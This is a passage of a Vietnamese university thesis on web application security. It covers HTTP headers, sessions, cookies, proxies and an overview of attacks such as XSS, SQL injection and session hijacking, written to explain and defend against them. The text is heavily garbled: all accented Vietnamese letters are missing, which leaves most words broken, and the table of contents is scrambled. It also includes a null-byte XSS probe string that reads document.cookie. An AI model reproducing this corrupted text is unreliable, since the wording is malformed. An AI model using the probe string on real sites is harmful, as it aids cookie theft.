Bao Mat Ung Dung Web Tren Internet - Diendandaihoc - VN - 08040603062011

Khoa CNTT
B GIO DC V O TO TRNG I HC KHOA HC T NHIN TP.HCM KHOA CNG NGH THNG TIN B MN MNG MY TNH
LUN VN TT NGHIP
TI:
NGHIN CU MT S VN V BO MT NG DNG WEB TRN INTERNET
GVHD: Th.S. MAI VN CNG SVTH : NGUYN DUY THNG - 9912074 NGUYN MINH THU - 9912156
KHA HC: 1999-2003
Khoa CNTT
Li cm n
Sau gn 6 thng n lc thc hin, lun vn nghin cu Cc k thut tn cng v bo mt ng dng Web trn Internet phn no hon thnh. Ngoi s c gng ht mnh ca bn thn, chng em nhn c s khch l rt nhiu t pha nh trng, thy c, gia nh v bn b. Trc ht chng con xin cm n ba m lun ng vin v to mi iu kin tt chng con hc tp v hon thnh lun vn tt nghip ny. Chng em xin cm n thy c trng i Hc Khoa Hc T Nhin truyn t nhng kin thc qu bu cho chng em trong sut qu trnh hc tp. c bit, chng em xin by t lng chn thnh su sc n thy Mai Vn Cng, ngi tn tnh hng dn v gip chng em trong qu trnh lm lun vn tt nghip. Xin cm n tt c bn b v ang ng vin, gip chng ti trong qu trnh hc tp v hon thnh tt lun vn tt nghip ny.
Khoa CNTT
Li nhn xt

Khoa CNTT
Nghin cu mt s vn v bo mt ng dng Web trn Internet
MC LC
GII THIU 7 T chc ca lun vn... 9 PHN TH NHT: C S L THUYT. 11 Chng 1: Gii thu ng dng Web.. 12 I. KHI NIM NG DNG WEB.. 13 II. M T HOT NG CA MT NG DNG WEB..... 16 Chng 2: Cc khi nim, thut ng lin quan .. 18 I. HACKER 19 II. HTTP HEADER... 19 III. SESSION. 21 IV. COOKIE.. 22 V. PROXY. 25 Chng 3: Gii thiu s lc v cc k thut tn cng ng dng Web.. 26 I. KIM SOT TRUY CP WEB 27 I.1. Thm nhp h thng qua ca sau.. 27 II. CHIM HU PHIN LM VIC... 27 II.1. n nh phin lm vic 27 II.2. nh cp phin lm vic. 27 III. LI DNG CC THIU ST TRONG VIC KIM TRA D LIU NHP HP L........ 27 III.1. Kim tra tnh ng n ca d liu bng ngn ng pha trnh duyt.... III.3. M ha URL.. III.5. Vt qua ng dn.. III.6. Chn m lnh thc thi trn trnh duyt nn nhn.. III.7. Thm cu lnh h thng.... 28 28 29 29 29 III.2. Trn b m... 28 III.4. K t Meta.. 28
Khoa CNTT
III.8. Chn cu truy vn SQL. III.9. Ngn ng pha my ch................................................................ III.10. K t rng.... III.11. Thao tc trn tham s truyn... IV. L THNG TIN. V. T CHI DCH V... Chng 4: Thao tc trn tham s truyn I. THAO TC TRN URL.. I.1. Khi nim.
30 30 30 30 31 31 34 35 35
PHN TH HAI: CC K THUT TN CNG V BO MT NG DNG WEB.. 33
I.2. Mt s bin php khc phc. 36 II. THAO TC TRN BIN N FORM. 36 II.1. Khi nim 36 II.2. Mt s bin php khc phc... III. THAO TC TRN COOKIE III.1. Khi nim . III.2. Mt s bin php khc phc.. IV.1. Khi nim.. 38 39 39 40 41
IV. THAO TC TRONG HTTP HEADER. 41 IV.2. Mt s bin php khc phc.. 42 Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Side Scripting). 43 I. K THUT TN CNG CROSS-SITE SCRIPTING (XSS)... 44 II. PHNG PHP TN CNG XSS TRUYN THNG... III. MT S WEBSITE TM THY L HNG XSS... IV. TN CNG XSS BNG FLASH. V. CCH PHNG CHNG I. KHI NIM SQL INJECTION... II. GII THIU M HNH C S D LIU... 46 50 51 54 57 57
Chng 6: Chn cu truy vn SQL (SQL Injection). 56
Khoa CNTT
III. CC CCH TN CNG. III.1. K thut tn cng SQL Injection... III.2. Tn cng da vo cu lnh SELECT III.3. Tn cng da vo cu lnh HAVING... III.4. Tn cng da vo cu lnh kt hp UNION III.5. Tn cng da vo lnh INSERT... III.6. Tn cng da vo STORED PROCEDURE III.7. Nng cao... III.7.1. Chui k t khng c du nhy n. III.7.2. Tn cng 2 tng III.7.3. Trnh s kim sot... III.7.4. Dng Extended Stored Procedure III.7.4.1. Dng Extended Stored Procedure c sn trong h thng SQL Server... III.7.4.2. Dng Extended Stored Procedure t to. III.7.4.3. Nhp tp tin vn bn vo bng IV. CCH PHNG CHNG IV.1. Kim tra d liu.. IV.2. Kho cht SQL Server (SQL Server Lockdown)... Chng 7: Chim hu phin lm vic (Session Management) I. TNG QUAN V SESSION ID.. II. N NH PHIN LM VIC... II.1. Tn cng Session ID trn tham s URL II.2. Tn cng Session ID trong bin n form... II.3. Tn cng Session ID trong cookie. II.4. Cch phng chng. III. NH CP PHIN LM VIC.. III.1. Tn cng kiu d on phin lm vic (Prediction sessionID) III.2. Tn cng kiu vt cn phin lm vic (Brute force ID)... III.3. Tn cng kiu dng on m nh cp phin lm vic...
58 58 60 62 62 69 70 70 70 71 74 75 75 76 77 77 78 81 83 84 85 88 89 89 91 92 93 93 94
Khoa CNTT
III.4. Cch phng chng. III.5. S khc bit gia nh cp phin lm vic (session hijacking) v n nh phin lm vic (session fixation)... Chng 8: Trn b m (Buffer Overflow).. I. KHI NIM. II. S T CHC CA B NH. II.1. Stack... II.2. Push v Pop II.3. Cch lm vic ca hm.. II.4. Shell code... III. MT S CCH GY TRN B M QUA NG DNG WEB. IV. CC CCH PHNG CHNG. Chng 9: T chi dch v (DoS).
94 94 97 98 99 100 101 102 104 106 106 108
I. KHI NIM.. 109 II. NHNG KH NNG B TN CNG BNG DOS. 109 III. CC K THUT TN CNG.. III.1. Khi nim v Tcp bt tay ba chiu III.2. Li dng TCP thc hin phng php SYN flood truyn thng.. III.3. Tn cng vo bng thng.. III.3.1. Kiu tn cng th 1.. III.3.2. Kiu tn cng th 2.. III.4. Kiu tn cng vo ti nguyn h thng. IV. BIN PHP PHNG CHNG. Chng 10: Mt s k thut tn cng khc... I. M HA URL (URL Encoding) I.1. Khi nim I.2. Mt s bin php phng chng... II. KIU TN CNG VT NG DN II.1. Khi nim.. 110 110 112 113 113 113 117 117 119 120 120 121 121 121
Khoa CNTT
II.2. Mt s bin php phng chng.. III. TN CNG DA VO K T RNG... III.1. Khi nim.. III.2. Mt s bin php phng chng. IV. NGN NG PHA TRNH CH. IV.1. Khi nim.. IV.2. Cch tn cng IV.3. Bin php phng chng Chng 11: Tng kt qu trnh tn cng ca Hacker... I. THU THP THNG TIN MC H TNG CA MC TIU II. KHO ST NG DNG WEB III. TN CNG.. Chng 12: Tng kt cc bin php phng chng... I. VI NHNG NH QUN TR MNG II. VI NHNG NH THIT K NG DNG WEB. III. VI NGI S DNG NG DNG WEB... PHN TH BA: CHNG TRNH WEB CHECKER.. Chng 13: Chng trnh Web Checker.. I. C T CHNG TRNH WEB CHECKER.. I.1. Tng quan... I.2. Yu cu... I.2.1. Yu cu chc nng. I.2.1. Yu cu phi chc nng... II. KIN TRC CHNG TRNH WEB CHECKER.. II.1. Kin trc chng trnh Web Checker... II.2. Giao tip gia chng trnh vi trnh ch Web. III. CI T... III.1. Ngn ng ci t.. III.2. Phng php ci t.
122 123 123 123 123 123 125 125 127 128 131 132 134 135 137 139 140 141 142 142 142 142 143 143 143 144 145 145 145
Khoa CNTT
III.2.1. S dng m hnh giao din dng Dialog. III.2.2. S dng ActiveX Control (Microsoft Web Browser). III.2.3. S dng giao din lp trnh Window Socket 2 III.2.4. Mt s lp v hm chnh c ci t trong chng trnh. III.3. M t chng trnh v cch s dng III.3.1. Mn hnh chng trnh III.3.2. Cch s dng... IV. NH GI CHNG TRNH IV.1. Nhng vn t c.. IV.2. Nhng vn hn ch KT LUN... I. NHNG VN T C. II. HNG PHT TRIN. PH LC..
145 145 146 146 151 151 152 153 153 153 155 156 157 158
Khoa CNTT
GII THIU
Ngy nay, khi Internet c ph bin rng ri, cc t chc, c nhn u c nhu cu gii thiu thng tin ca mnh trn xa l thng tin cng nh thc hin cc phin giao dch trc tuyn. Vn ny sinh l khi phm vi ng dng ca cc ng dng Web ngy cng m rng th kh nng xut hin li v b tn cng cng cao, tr thnh i tng cho nhiu ngi tn cng vi cc mc ch khc nhau. i khi, cng ch n gin l th ti hoc a bn vi ngi khc. Cng vi s pht trin khng ngng ca Internet v cc dch v trn Internet, s lng cc v tn cng trn Internet cng tng theo cp s nhn. Trong khi cc phng tin thng tin i chng ngy cng nhc nhiu n nhng kh nng truy nhp thng tin ca Internet, th cc ti liu chuyn mn bt u cp nhiu n vn bo m v an ton d liu cho cc my tnh c kt ni vo mng Internet. Theo s liu ca CERT (Computer Emegency Response Team - "i cp cu my tnh"), s lng cc v tn cng trn Internet c thng bo cho t chc ny l t hn 200 vo nm 1989, khong 400 vo nm 1991, 1400 vo nm 1993, v 2241 vo nm 1994, v nm 2001 l 5315 v. Nhng v tn cng ny nhm vo tt c cc my tnh c mt trn Internet, cc my tnh ca tt c cc cng ty ln nh AT&T, IBM, cc trng i hc, cc c quan nh nc, cc t chc qun s, nh bng... Mt s v tn cng c quy m khng l (c ti 100.000 my tnh b tn cng). Hn na, nhng con s ny ch l phn ni ca tng bng. Mt phn rt ln cc v tn cng khng c thng bo, v nhiu l do, trong
-Trang 7-
Khoa CNTT
c th k n ni lo b mt uy tn, hoc n gin nhng ngi qun tr h thng khng hay bit nhng cuc tn cng ang nhm vo h thng ca h. in hnh l cuc tn cng vo phn mm thng mi ca IBM thng 3/2001, hai hacker tm thy l hng trn ng dng m bt c ai vi mt trnh duyt Web cng c th ly ti khon ca ngi dng, thm ch c ngi qun tr. Khng ch s lng cc cuc tn cng tng ln nhanh chng, m cc phng php tn cng ngy cng tinh vi v c t chc. Mt khc, vic qun tr cc h thng mng i hi nh qun tr h thng c kin thc v kinh nghim v h thng mng chc chn, do s yu km trong qun l s to nhiu iu kin cho cc hacker khai thc. Cng theo CERT, nhng cuc tn cng thi k 1988-1989 ch yu l on tn ngi s dng-mt khu (UserID/password) hoc s dng mt s li ca cc chng trnh v h iu hnh (security hole) lm v hiu h thng bo v, tuy nhin cc cuc tn cng vo thi gian gn y cn bao gm c cc thao tc nh gi mo a ch IP, theo di thng tin truyn qua mng, chim cc phin lm vic t xa (telnet hoc rlogin), ci trojan hay worm kim sot hay iu khin my tnhv th, nhu cu bo v thng tin trn Internet l cn thit nhm mc ch bo v d liu, bo v thng tin ngi dng v bo v h thng. Khi ni n vn bo mt, hu ht cc chuyn gia bo mt u ch trng n s an ton ca h thng mng v h iu hnh. bo v cho h thng, phng php thng c chn l s dng firewall. Tuy nhin, theo tuyn b ca CSI/FBI : 78% ni b hi c s dng firewall v 59% th b tn cng thng qua Internet, c th hn l theo bo co ca CSI/FBI Computer Crime v Security Survey th tng s thit hi do nhng ng dng Web b tn cng t nm 1997 n nm 2000 l 626 triu la M.
-Trang 8-
Khoa CNTT
Vi nhng cng c t ng tm l hng tuy gip rt nhiu cho nhng nh lp trnh Web nhng vn khng th ngn chn ton b v cng ngh Web ang pht trin nhanh chng (ch yu ch trng n yu t thm m, yu t tc ) nn dn n nhiu khuyt im mi pht sinh. S tn cng khng nm trong khun kh vi k thut pht hin, m linh ng v tng ln ty vo nhng sai st ca nh qun tr h thng cng nh ca nhng ngi lp trnh ng dng. Lun vn c thc hn vi mc ch tm hiu, phn tch cc l hng bo mt trong cc ng dng web (cng vi chng trnh minh ha) qua xut cc phng n sa cha. Song song , lun vn cn thc hin mt chng trnh T ng pht hin l hng trn ng dng Web gip ch cho nhng nh lp trnh Web t kinh nghim trnh nhng sai st trong qu trnh to cc ng dng.
T chc ca lun vn
Lun vn gm 13 chng chia thnh 3 phn: Phn th nht: C S L THUYT Phn ny gm c 3 chng: + Chng 1 : Gii thiu v ng dng Web + Chng 2 : Mt s khi nim, thut ng lin quan. + Chng 3: S lc cc k thut tn cng ng dng Web Phn th hai:CC K THUT TN CNG V BIN PHP PHNG CHNG Phn ny gm c 9 chng t chng 4 n chng 12 trong 7 chng u bn lun v cc k thut tn cng, cui mi chng l bin php phng chng cho tng k thut. Chng 11 ni v qu trnh tn cng ca hacker v n chng 12 l ni dung cc bin php phng chng chung nht.
-Trang 9-
Khoa CNTT
Phn th ba : CHNG TRNH WEB CHECKER L gm chng cui trnh by, gii thch v chng trnh Kt thc lun vn l phn kt lun, tm lc li nhng vn trnh by v mt s hng pht trin trong tng lai v danh mc cc ti liu tham kho.
-Trang 10-
Khoa CNTT
Phn I: C s l thuyt
PHN TH NHT
C S L THUYT
-Trang 11-
Khoa CNTT
Chng 1: Gii thiu ng dng Web
Chng 1
GII THIU NG DNG WEB

Ni dung: I. II. Khi nim v ng dng Web M t cch hot ng ca mt ng dng Web
-Trang 12-
Khoa CNTT
CHNG 1: GII THIU NG DNG WEB
Lun vn c thc hin nhm tm hiu v cc k thut tn cng trang Web v ra cch phng chng. Do , trong chng u tin lun vn s gii thiu s lc mt s khi nim c bn v y chnh l nn tng xy dng ni dung cho nhng phn sau.
I. KHI NIM NG DNG WEB

ng dng Web l mt ng dng ch/khch s dng giao thc HTTP tng tc vi ngi dng hay h thng khc. Trnh khch dnh cho ngi s dng thng l mt trnh duyt Web nh Internet Explorer hay Netscape Navigator. Cng c th l mt chng trnh ng vai tr i l ngi dng hot ng nh mt trnh duyt t ng. Ngi dng gi v nhn cc thng tin t trnh ch thng qua vic tc ng vo cc trang Web. Cc chng trnh c th l cc trang trao i mua bn, cc din n, gi nhn e-mail Tc pht trin cc k thut xy dng ng dng Web cng pht trin rt nhanh. Trc y nhng ng dng Web thng c xy dng bng CGI (Common Gateway Interface) c chy trn cc trnh ch Web v c th kt ni vo cc c s d liu n gin trn cng my ch. Ngy nay ng dng Web thng c vit bng Java (hay cc ngn ng tng t) v chy trn my ch phn tn, kt ni n nhiu ngun d liu. Mt ng dng web thng c kin trc gm:
-Trang 13-
Khoa CNTT
Hnh 1.I-1. Kin trc mt ng dng Web
Lp trnh by: Lp ny c nhim v hin th d liu cho ngi dng, ngoi ra cn c th c thm cc ng dng to b cc cho trang web. Lp ng dng: l ni x l ca ng dng Web. N s x l thng tin ngi dng yu cu, a ra quyt nh, gi kt qu n lp trnh by. Lp ny thng c ci t bng cc k thut lp trnh nh CGI, Java, .NET , PHP hay ColdFusion, c trin khai trn cc trnh ch nh IBM WebSphere, WebLogic, Apache, IIS Lp d liu: thng l cc h qun tr d liu (DBMS) chu trch nhim qun l cc file d liu v quyn s dng. M hnh ha hot ng ca mt ng dng Web:
-Trang 14-
Khoa CNTT
Hnh 1.I-2. M hnh hot ng ca mt ng dng Web
Trong : Trnh khch ( hay cn gi l trnh duyt): Internet Explorer, Netscap Navigator Trnh ch: Apache, IIS, . H qun tr c s d liu: SQL Server, MySQL, DB2, Access. Bn cnh , mt gii php dng bo v mt h thng mng thng c s dng l bc tng la, n c vai tr nh l lp ro chn bn ngoi mt h thng mng, v chc nng chnh ca firewall l kim sot lung thng tin gia cc my tnh. C th xem firewall nh mt b lc thng tin, n xc nh v cho php mt my tnh ny c c truy xut n mt my tnh khc hay khng, hay mt mng ny c c truy xut n mng kia hay khng. Ngi ta thng dng firewall vo mc ch: Cho php hoc cm nhng dch v truy xut ra ngoi.
-Trang 15-
Khoa CNTT
Cho php hoc cm nhng dch v t bn ngoi truy nhp vo trong. Kim sot a ch truy nhp, cm a ch truy nhp. Firewall hot ng da trn gi IP do kim sot vic truy nhp ca my ngi s dng
II.M T HOT NG CA MT NG DNG WEB

u tin trnh duyt s gi mt yu cu (request) n trnh ch Web thng qua cc lnh c bn GET, POST ca giao thc HTTP, trnh ch lc ny c th cho thc thi mt chng trnh c xy dng t nhiu ngn ng nh Perl, C/C++ hoc trnh ch yu cu b din dch thc thi cc trang ASP, JSP theo yu cu ca trnh khch. Ty theo cc tc v ca chng trnh c ci t m n x l, tnh ton, kt ni n c s d liu, lu cc thng tin do trnh khch gi nv t tr v cho trnh khch 1 lung d liu c nh dng theo giao thc HTTP, n gm 2 phn: Header m t cc thng tin v gi d liu v cc thuc tnh, trng thi trao i gia trnh duyt v WebServer. Body l phn ni dung d liu m Server gi v Client, n c th l mt file HTML, mt hnh nh, mt on phim hay mt vn bn bt k. Theo m hnh hnh 1.I-2, vi firewall, lung thng tin gia trnh ch v trnh khch l lung thng tin hp l. V th, nu hacker tm thy vi l hng trong ng dng Web th firewall khng cn hu dng trong vic ngn chn hacker ny. Do , cc k thut tn cng vo mt h thng mng ngy nay ang dn tp trung vo nhng s sut (hay l hng) trong qu trnh to ng dng ca nhng nh pht trin Web hn l tn cng trc tip vo h thng mng, h iu hnh. Tuy nhin, hacker cng c th
-Trang 16-
Khoa CNTT
li dng cc l hng Web m rng s tn cng ca mnh vo cc h thng khng lin quan khc.
-Trang 17-
Khoa CNTT
Chng 2: Cc khi nim, thut ng lin quan
Chng 2
CC KHI NIM, THUT NG LIN QUAN

Ni dung: I. II. Hacker HTTP Header
III. Phin lm vic (Session) IV. Cookie V. Proxy
-Trang 18-
Khoa CNTT
CHNG 2: CC KHI NIM, THUT NG LIN QUAN
I. HACKER
Hacker l mt thut ng dng chuyn ch nhng k ph hoi cc h thng mng Hacker thng l nhng chuyn gia v my tnh. Hacker khng to ra cc k h cho h thng, nhng hacker li l nhng ngi am hiu v h iu hnh, h qun tr d liu, cc ngn ng lp trnhH s dng kin thc ca mnh trong vic tm ti v khai thc cc l hng ca h thng mng. Mt s hacker ch dng li vic pht hin v thng bo li tm c cho nhng nh bo mt hay ngi pht trin chng trnh, h c xem nh l WhiteHat (Hacker nn trng). Mt s hacker da vo nhng l hng thc hin vic khai thc tri php nhm mc ch ph hoi hay mu li ring, nhng ngi ny b xem nh l BlackHat (Hacker nn en). V tnh cht ph bin ca thut ng hacker, nn trong phn trnh by, lun vn s s dng hacker thay cho k tn cng.
II.HTTP HEADER
HTTP header l phn u (header) ca thng tin m trnh khch v trnh ch gi cho nhau. Nhng thng tin trnh khch gi cho trnh ch c gi l HTTP requests (yu cu) cn trnh ch gi cho trnh khch l HTTP responses (tr li). Thng thng, mt HTTP header gm nhiu dng, mi dng cha tn tham s v gi tr. Mt s
-Trang 19-
Khoa CNTT
tham s c th c dng trong c header yu cu v header tr li, cn s khc th ch uc dng ring trong tng loi. V d : Header yu cu:
GET /tintuc/homnay.asp HTTP/1.1 Accept: */* Accept-Language: en-us Connection: Keep-Alive Host: localhost Referer: http://localhost/lienket.asp User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Accept-Encoding: gzip, deflate
Dng u l dng yu cu cho bit phng thc yu cu (GET hoc POST), a ch yu cu (/tintuc/homnay.asp) v phin bn HTTP (HTTP/1.1)..
o Tip theo l cc tham s. Chng hn nh: Accept-Language: Cho bit ngn ng dng trong trang web. Host: Cho bit a ch ca my ch. Referer: Cho bit a ch ca trang web tham chiu ti. o Header ca HTTP request s kt thc bng mt dng trng. Header tr li:
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 13 Jul 2000 05:46:53 GMT
-Trang 20-
Khoa CNTT
Content-Length: 2291 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQGGGNCG=LKLDFFKCINFLDMFHCBCBMFLJ; path=/ Cache-control: private <HTML> <BODY> ...
o Dng u l dng trng thi, cho bit phin bn HTTP c dng (HTTP/1.1), m trng thi (200) v trng thi (OK). o Tip theo l cc tham s. o Tip theo l mt dng trng bo hiu kt thc header, tip theo l phn thn ca HTTP response. Danh sch tham s ca HTTP header c trnh by trong ph lc A
III. SESSION
HTTP l giao thc hng i tng tng qut, phi trng thi, ngha l HTTP khng lu tr trng thi lm vic gia trnh duyt vi trnh ch. S thiu st ny gy kh khn cho mt s ng dng Web, bi v trnh ch khng bit c trc trnh duyt c nhng trng thi no. V th, gii quyt vn ny, ng dng Web a ra mt khi nim phin lm vic (Session). Cn SessionID l mt chui chng thc phin lm vic. Mt s trnh ch s cung cp mt SessionID cho ngi dng khi h xem trang web trn trnh ch. duy tr phin lm vic th sessionID thng c lu vo :
-Trang 21-
Khoa CNTT
Bin trn URL Bin n form Cookie Phin lm vic ch tn ti trong mt khong thi gian cho php, thi gian ny c cu hnh qui nh ti trnh ch hoc bi ng dng thc thi. Trnh ch s t ng gii phng phin lm vic khi phc li ti nguyn ca h thng.
IV. COOKIE
Cookie l nhng phn d liu nh c cu trc c chia s gia trnh ch v trnh duyt ca ngi dng. Cc cookie c lu tr di nhng file d liu nh dng text, c ng dng to ra lu tr/truy tm/nhn bit cc thng tin v ngi dng gh thm trang Web v nhng vng m h i qua trong trang. Nhng thng tin ny c th bao gm tn/nh danh ngi dng, mt khu, s thch, thi quen...cookie c trnh duyt ca ngi dng chp nhn lu trn a cng ca my mnh, tuy nhin khng phi lc no trnh duyt cng h tr cookie, m cn ty thuc vo ngi dng c chp nhn chuyn lu tr hay khng. nhng ln truy cp sau n trang Web , ng dng c th dng li nhng thng tin trong cookie (nh thng tin lin quan n vic ng nhp vo Yahoo Messenger!...) m ngi dng khng phi lm li thao tc ng nhp hay phi cung cp li cc thng tin khc. Cookie c phn lm 2 loi secure/non-secure v persistent/non-persistent do ta s c 4 kiu cookie l:
-Trang 22-
Khoa CNTT
Persistent v Secure Persistent v Non-Secure Non-Persistent v Secure Non-Persistent v Non-Secure Persistent cookies c lu tr di dng tp tin .txt (v d trnh duyt Netscape Navigator s lu cc cookie thnh mt tp tin cookie.txt cn Internet Explorer s lu thnh nhiu tp tin *.txt trong mi tp tin l mt cookie) trn my khch trong mt khon thi gian xc nh. Non-persistent cookie th c lu tr trn b nh RAM ca my khch v s b hy khi ng trang web hay nhn c lnh hy t trang web. Secure cookies ch c th c gi thng qua HTTPS (SSL). Non-Secure cookie c th c gi bng c hai giao thc HTTPS hay HTTP. Thc cht l i vi secure cookie th trnh ch s cung cp ch truyn bo mt. Cc thnh phn ca mt cookie gm:
Domain www.redhat. com Flag FALSE Path / Secure FALSE Expiration 1154029490 Name Apache Value 64.3.40.151.16 018996349247 480
Domain: Tn min ca trang web to cookie ( trong v d trn l www.redhat.com)
-Trang 23-
Khoa CNTT
Flag: mang gi tr TRUE/FALSE -Xc nh cc my khc vi cng tn min c c truy xut n cookie hay khng. Path: Phm vi cc a ch c th truy xut cookie. V d: Nu path l /tracuu th cc a ch trong th mc /tracuu cng nh tt c cc th mc con ca n nh /tracuu/baomat c th truy xut n cookie ny. Cn nu gi tri l / th cookie s c truy xut bi tt c a ch thuc min trang web to cookie. Sercure: mang gi tr TRUE/FALSE - Xc nh y l mt secure cookie hay khng ngha l kt ni c s dng SSL hay khng. Expiration: thi gian ht hn ca cookie, c tnh bng giy k t 00:00:00 gi GMT ngy 01/01/1970. Nu gi tr ny khng c thit lp th trnh duyt s hiu y l non-persistent cookie v ch lu trong b nh RAM v s xo n khi trnh duyt b ng. Name: Tn bin (trong trng hp ny l Apache) Value: Vi cookie c to trn th gi tr ca Apache l 64.3.40.151.16018996349247480 v ngy ht hn l 27/07/2006, ca tn min http://www.redhat.com. V d chui lnh trong HTTP header di y s to mt cookie:
Set-Cookie:Apache="64.3.40.151.16018996349247480"; path="/"; domain="www.redhat.com"; path_spec; expires="2006-07-27 19:39:15Z"; version=0
Cc cookie ca Netscape (NS) t trong mt tp tin Cookies.txt, vi ng dn l: C:\Program Files\Netscape\Users\UserName\Cookies.txt
-Trang 24-
Khoa CNTT
Cc cookies ca IE c lu thnh nhiu tp tin, mi tp tin l mt cookie v c t trong [C:]\Documents and Setting\[username]\Cookies (Win2000), i vi win9x, th mc cookies nm trong th mc [C:]\Windows\cookies. Kch thc ti a ca cookie l 4kb. S cookie ti a cho mt tn min l 20 cookie. Cookie b hy ngay khi ng trnh duyt gi l session cookie.
V. PROXY
Proxy cung cp cho ngi s dng truy xut Internet nhng nghi thc t bit hoc mt tp nhng nghi thc thc thi trn dual_homed host hoc basion host. Nhng chng trnh client ca ngi s dng s qua trung gian proxy server thay th cho server tht s m ngi s dng cn giao tip. Proxy server xc nh nhng yu cu t client v quyt nh p ng hay khng p ng, nu yu cu c p ng, proxy server s kt ni vi server tht thay cho client v tip tc chuyn tip nhng yu cu t client n server, cng nh tr li ca server n client. V vy proxy server ging cu ni trung gian gia server v client.
-Trang 25-
Khoa CNTT
Chng 3: Gii thiu s lc v cc k thut tn cng
Chng 3
GII THIU S LC V CC K THUT TN CNG NG DNG WEB

Ni dung: I. II. Kim sot quyn truy cp Web Chim hu phin lm vic
III. Li dng cc thiu st trong vic kim tra d li hp hp l IV. l thng tin V. T chi dch v
-Trang 26-
Khoa CNTT
CHNG 3: GII THIU S LC V CC K THUT TN CNG NG DNG WEB
Sau y l cc khi nim s lc cc k thut tn cng ng dng Web c phn loi da trn mc gy tc hi i vi ng dng.
I. KIM SOT TRUY CP WEB (Web Access Control)

I.1. Thm nhp h thng qua ca sau (Back door)
Trong qu trnh thit k ng dng, nhng ngi pht trin ng dng c th ci mt ca sau (back door) sau ny c th thm nhp vo h thng mt cch d dng.
II.CHIM HU PHIN LM VIC(Session Mangement)

II.1. n nh phin lm vic (Session Fixation)
L k thut tn cng cho php hacker mo danh ngi dng hp l bng cch gi mt session ID hp l n ngi dng, sau khi ngi dng ng nhp vo h thng thnh cng, hacker s dng li session ID v nghim nhin tr thnh ngi dng hp l.
II.2. nh cp phin lm vic (Session Hijacking)
-Trang 27-
Khoa CNTT
L k thut tn cng cho php hacker mo danh ngi dng hp l sau khi nn nhn ng nhp vo h thng bng cch gii m session ID ca h c lu tr trong cookie hay tham s URL, bin n ca form.
III. LI DNG CC THIU ST TRONG VIC KIM TRA

D LIU NHP HP L (Input validation)
Hacker li dng nhng nhp d liu gi i mt on m bt k khin cho h thng phi thc thi on lnh hay b ph v hon ton.
III.1. Kim tra tnh ng n ca d liu bng ngn ng pha

trnh duyt (Client-Side validation)
Do ngn ng pha trnh duyt ( JavaScript, VBScript..) uc thc thi trn trnh duyt nn hacker c th sa i m ngun c th v hiu ha s kim tra.
III.2. Trn b m (Buffer OverFlow)

Mt khi lng d liu c gi cho ng dng vt qu lng d liu c cp pht khin cho ng dng khng thc thi c cu lnh d nh k tip m thay vo phi thc thi mt on m bt k do hacker a vo h thng. Nghim trng hn nu ng dng c cu hnh thc thi vi quyn root trn h thng.
III.3. M ho URL (URL Encoding)

Li dng chun m ha nhng k t c bit trn URL m hacker s m ho t ng nhng k t bt hp l- nhng k t b kim tra bng ngn ng kch bn- vt qua vng kim sot ny.
III.4. K t Meta (Meta-characters)
-Trang 28-
Khoa CNTT
S dng nhng k t c bit ( ni r hn trong phn ph lc) hacker c th chn thm vo d liu gi nhng k t trong chui cu lnh nh <script> trong k thut XSS, -- trong SQL. thc thi cu lnh.
III.5. Vt qua ng dn (Path Traversal):

L phng php li dng ng dn truy xut mt tp tin trn URL tr kt qu v cho trnh duyt m hacker c th ly c ni dung tp tin bt k trn h thng.
III.6. Chn m lnh thc thi trn trnh duyt nn nhn

(Cross- Site Scripting):
y l k thut tn cng ch yu nhm vo thng tin trn my tnh ca ngi dng hn l vo h thng my ch. Bng cch thm mt on m bt k ( thng c lp trnh bng ngn ng kch bn nh JavaScript, VBScript), hacker c th thc hin vic nh cp thng tin quan trng nh cookie t tr thnh ngi dng hp l ca ng dngda trn nhng thng tin nh cp ny. CrossSite scripting cng l mt kiu tn cng session hijacking.
III.7. Thm cu lnh h thng (OS Command Injection):

Kh nng thc thi c nhng cu lnh h thng hay nhng on m c thm vo trong nhng tham s m khng c s kim tra cht ch nh tham s ca form, cookies, yu cu HTTP Header, v nhng d liu nguy him trong nhng tp tin c a ln trnh ch. Thnh cng trong k thut ny gip hacker c th thc thi c nhng cu lnh h thng vi cng quyn ca trnh ch.
-Trang 29-
Khoa CNTT
III.8. Chn cu truy vn SQL (SQL Injection)

Trong lp trnh vi c s d liu, ngi lp trnh sai st trong vn kim tra gi tr nhp vo t hacker li dng thm vo nhng cu truy vn hay nhng gi tr khng hp l d dng ng nhp vo h thng.
III.9. Ngn ng pha my ch (Server side includes)

L kh nng thm vo nhng cu lnh thuc h thng nh nhng file (include file), truy xut c s d liu (jdbc)khin cho hacker c c hi truy xut n file, c s d lium bnh thng khng th xem c trn Web site.
III.10. K t rng (Null Characters)

Li dng chui k t thng kt thc bng \0 m hacker thng thm vo nh la ng dng v vi nhng ng dng s dng chng trnh cgi nh C++ th C++ cho rng \0 l du kt thc chui. V d: Hacker thm chui sau: nhp: ti th nht\0<script> alert(document.cookie)</script> nu ng dng s dng chng trnh C++ kim tra tnh ng n ca chui th chui trn hp l do C++ s nhn bit \0 l kt thc chui nn khng kim tra on sau..
III.11. Thao
tc
trn
tham
truyn
(Parameter
manipulation)
Nhng thng tin trao i gia trnh ch v trnh duyt c lu tr trong nhng bin nh bin trn URL, bin n form, cookieBi v vic kim sot bin cha
-Trang 30-
Khoa CNTT
c quan tm ng mc nn hacker c th li dng sa i gi tr bin nh cp phin lm vic ca ngi dng hay thay i gi tr mt mn hng.
IV. L THNG TIN (informational)

Nhng tp tin v ng dng trn h thng cha nhng thng tin quan trng nh m ngun mt trang Web hay tp tin cha mt khu ca ngi dng trn h thng lun l mc tiu ca hacker. Ngoi ra nhng li ch thch trong m ngun cng l ngun thng tin hu ch cho hacker. Hacker s dng tr li HTTP t h thng xc nh mt tp tin hay ng dng c tn ti hay khng. V d 1.IV-1: HTTP 200 : tp tin tn ti HTTP 404: tp tin khng tn ti.
V.T CHI DCH V (Denial of service (DoS)

Mt khi lng ln yu cu c gi cho ng dng trong mt khong thi gian nht nh khin h thng khng p ng kp yu cu dn n h thng b ph v. V khun kh v thi gian ca lun vn l c hn nn lun vn ch thc hin tm hiu mt s k thut ph bin v kh nng ph hoi mt h thng mng vi mc cao. V trong cc chng phn th hai, lun vn s trnh by k hn tng k thut sau : Thao tc trn tham s truyn Chn m lnh thc thi trn trnh duyt Chn cu truy vn SQL Chim hu phin lm vic
-Trang 31-
Khoa CNTT
